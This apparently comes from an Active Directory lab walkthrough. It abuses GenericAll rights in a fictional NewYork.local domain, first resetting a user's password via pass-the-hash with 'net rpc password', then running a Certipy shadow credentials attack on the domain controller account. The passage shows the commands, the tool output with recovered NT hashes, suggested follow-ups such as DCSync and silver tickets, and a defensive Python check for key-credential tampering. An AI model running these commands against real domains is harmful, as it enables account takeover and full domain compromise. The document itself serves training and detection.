Generic all on user (CentralPark -> diego.Montenegro)

  • Now that Nicolas.Maduro is a member of CentralPark, we can take control of diego.Montenegro through the GenericAll that CentralPark holds on that user.

  • Let's change diego.Montenegro's password with Samba's net rpc (ldeep can also do it), authenticating as Nicolas.Maduro with his NT hash rather than a cleartext password, which is what --pw-nt-hash tells net the -U credential is:

net rpc password diego.Montenegro --pw-nt-hash -U NewYork.local/Nicolas.Maduro%b3b3717f7d51b37fb325f7e7d048e998 -S NYC.Newyork.local
  • When prompted, set the new password to letsdothis. Resetting the password is the noisy option: the legitimate user loses access and the reset is logged on the DC (event 4724), so prefer it only when a quieter path is not available.

GenericAll on Computer (diego.Montenegro -> NYC)

  • Now that we own diego.Montenegro, let's finish the domain with the GenericAll that diego.Montenegro holds on the DC's computer account (NYC$).

  • We already did this in the previous chapter, by adding our own computer account to the domain.

  • But what if you can't add a computer to the domain? More and more customers set ms-DS-MachineAccountQuota to 0 so that ordinary users can no longer join machines (a good practice from a security point of view). In that case you can run a shadow credentials attack against the computer account instead.

  • Shadow credentials needs two things: the DCs must support PKINIT (in practice ADCS is deployed and the DC holds a certificate usable for Kerberos authentication, which implies at least one Windows Server 2016 or later DC), and we need write access to the target's msDS-KeyCredentialLink attribute, which GenericAll gives us. We add our own key credential to that attribute, then authenticate as the target with the matching certificate, giving direct access to the target account.

  • Shadow credentials is now built into Certipy (the attack can also be done with pyWhisker).

certipy shadow auto -u diego.Montenegro@NewYork.local -p 'letsdothis' -account 'NYC$'

Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Targeting user 'NYC$'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '86b8f1a3-21b0-1a7f-bba2-b683a92326ae'
[*] Adding Key Credential with device ID '86b8f1a3-21b0-1a7f-bba2-b683a92326ae' to the Key Credentials for 'NYC$'
[*] Successfully added Key Credential with device ID '86b8f1a3-21b0-1a7f-bba2-b683a92326ae' to the Key Credentials for 'NYC$'
[*] Authenticating as 'NYC$' with the certificate
[*] Using principal: nyc$@newyork.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'nyc.ccache'
[*] Trying to retrieve NT hash for 'nyc$'
[*] Restoring the old Key Credentials for 'NYC$'
[*] Successfully restored the old Key Credentials for 'NYC$'
[*] NT hash for 'NYC$': 4434b2874a45816ce75c971df2187ca6
  • Now we have a TGT for NYC$ (saved as nyc.ccache) and its NT hash. Certipy recovered the hash with UnPAC-the-hash from the certificate-based logon and then restored the original msDS-KeyCredentialLink value, so the added key credential is no longer on the object.

  • Since NYC is a DC, its computer account has replication rights, so a DCSync is obviously possible. Instead, let's try to get a shell directly.

  • The easiest ways to do that are S4U2self abuse (use the NYC$ TGT to request a service ticket to NYC for an impersonated user such as Administrator) or forging a silver ticket for a service on NYC with the NT hash we just obtained.
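A defender-side check for the attribute abused above, as an added example that is not part of the original walkthrough nor of Certipy or pyWhisker: it serializes and parses msDS-KeyCredentialLink values following the MS-ADTS KEYCREDENTIALLINK_BLOB layout (4-byte version 0x200, then entries of 2-byte length, 1-byte identifier and value, wrapped in a DN-Binary string) and reports which objects carry a key credential with a given DeviceID, such as the one Certipy printed. The sample attribute values, owner DNs and key material are constructed for the example, and the mixed-endian GUID byte order for DeviceId is an assumption. Fed with real LDAP results, the same parser lets you audit which accounts have key credentials, which device added them and when.

```python
"""Audit msDS-KeyCredentialLink values for a given DeviceID (added example).

Layout follows MS-ADTS KEYCREDENTIALLINK_BLOB: a 4-byte LE version (0x200),
then entries of [2-byte LE length][1-byte identifier][value]. The attribute
itself is DN-Binary: "B:<hex length>:<hex blob>:<owner DN>".
All sample data in this file is constructed for the example.
"""
import struct
import uuid

KEYCREDENTIALLINK_VERSION = 0x00000200
ENTRY_NAMES = {
    0x01: "KeyID", 0x02: "KeyHash", 0x03: "KeyMaterial", 0x04: "KeyUsage",
    0x05: "KeySource", 0x06: "DeviceId", 0x07: "CustomKeyInformation",
    0x08: "KeyApproximateLastLogonTimeStamp", 0x09: "KeyCreationTime",
}
# DeviceID printed by Certipy in the run above
ATTACKER_DEVICE_ID = "86b8f1a3-21b0-1a7f-bba2-b683a92326ae"


def build_blob(entries):
    """Serialize (identifier, value) pairs into a KEYCREDENTIALLINK_BLOB."""
    out = struct.pack("<I", KEYCREDENTIALLINK_VERSION)
    for ident, value in entries:
        out += struct.pack("<HB", len(value), ident) + value
    return out


def to_dn_binary(blob, owner_dn):
    """Wrap a blob the way LDAP returns DN-Binary attributes."""
    hexblob = blob.hex().upper()
    return f"B:{len(hexblob)}:{hexblob}:{owner_dn}"


def parse_dn_binary(value):
    """Split "B:<len>:<hex>:<dn>" into (blob bytes, dn); raise on malformed input."""
    tag, hexlen, rest = value.split(":", 2)
    hexlen = int(hexlen)
    if tag != "B" or rest[hexlen:hexlen + 1] != ":":
        raise ValueError("malformed DN-Binary value")
    return bytes.fromhex(rest[:hexlen]), rest[hexlen + 1:]


def parse_blob(blob):
    """Return {entry name: value}; DeviceId is decoded to uuid.UUID."""
    (version,) = struct.unpack_from("<I", blob, 0)
    if version != KEYCREDENTIALLINK_VERSION:
        raise ValueError(f"unsupported KeyCredentialLink version 0x{version:x}")
    off, entries = 4, {}
    while off < len(blob):
        if off + 3 > len(blob):
            raise ValueError("truncated entry header")
        length, ident = struct.unpack_from("<HB", blob, off)
        off += 3
        value = blob[off:off + length]
        if len(value) != length:
            raise ValueError("truncated entry value")
        off += length
        if ident == 0x06 and length == 16:
            # assumption: GUID stored in Windows mixed-endian (bytes_le) layout
            value = uuid.UUID(bytes_le=value)
        entries[ENTRY_NAMES.get(ident, f"Unknown(0x{ident:02x})")] = value
    return entries


def find_device_id(dn_binary_values, device_id):
    """Return owner DNs whose key credential carries the given DeviceID."""
    wanted = uuid.UUID(str(device_id))
    hits = []
    for raw in dn_binary_values:
        blob, dn = parse_dn_binary(raw)
        if parse_blob(blob).get("DeviceId") == wanted:
            hits.append(dn)
    return hits


def sample_values():
    """Constructed attribute values: one unrelated key, one with Certipy's DeviceID."""
    def make(owner_dn, device_id, key_material):
        blob = build_blob([
            (0x01, b"\x11" * 32),                           # KeyID (dummy SHA-256)
            (0x03, key_material),                           # KeyMaterial (dummy key)
            (0x04, b"\x01"),                                # KeyUsage: NGC
            (0x05, b"\x00"),                                # KeySource: AD
            (0x06, uuid.UUID(device_id).bytes_le),          # DeviceId
            (0x09, struct.pack("<Q", 133000000000000000)),  # KeyCreationTime (FILETIME)
        ])
        return to_dn_binary(blob, owner_dn)
    return [
        make("CN=Diego Montenegro,CN=Users,DC=NewYork,DC=local",
             "0d1f3b2a-7c55-4d5e-9b1a-2f4e6a8c0b1d", b"\xaa" * 64),
        make("CN=NYC,OU=Domain Controllers,DC=NewYork,DC=local",
             ATTACKER_DEVICE_ID, b"\xbb" * 64),
    ]


if __name__ == "__main__":
    for dn in find_device_id(sample_values(), ATTACKER_DEVICE_ID):
        print(f"[!] key credential with DeviceID {ATTACKER_DEVICE_ID} on {dn}")
```

Because Certipy restored the original attribute value at the end of the run, a live query afterwards would not show the device ID any more; the check is useful against directory snapshots, replication metadata or LDAP modify logs captured while the key credential was present, and as an ongoing inventory of which accounts carry key credentials at all.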
